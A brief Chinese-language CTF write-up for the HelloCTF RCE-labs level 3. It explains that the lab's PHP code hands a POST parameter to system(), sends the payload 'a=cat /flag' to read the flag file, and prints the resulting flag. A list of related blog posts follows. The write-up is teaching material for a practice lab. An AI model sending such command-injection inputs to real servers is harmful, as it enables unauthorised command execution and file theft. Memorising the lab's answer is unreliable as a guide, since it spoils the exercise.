HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
网络精创大傻17 小时前
PHP 与 Node.js:实际性能对比
开发语言·node.js·php
KevinLyu17 小时前
PHP内核详解· 内存管理篇(七)· 调整内存块大小
php
久违 °19 小时前
【安全开发】Nuclei源码分析-任务执行流程(三)
安全·网络安全·go
white-persist19 小时前
汇编代码详细解释:汇编语言如何转化为对应的C语言,怎么转化为对应的C代码?
java·c语言·前端·网络·汇编·安全·网络安全
hj104321 小时前
php上传企业微信附件的方法
开发语言·php·企业微信
游九尘21 小时前
在 PHP 中打印数据(调试、输出内容)
php
jenchoi4131 天前
【2025-11-03】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
Z_renascence1 天前
web214-web220
web安全·网络安全
我命由我123451 天前
Photoshop - Photoshop 工具栏(20)混合器画笔工具
经验分享·笔记·学习·ui·职场和发展·职场发展·photoshop
深圳市恒讯科技1 天前
使用站群服务器做SEO,如何避免被搜索引擎判定为“站群作弊”?
服务器·搜索引擎·php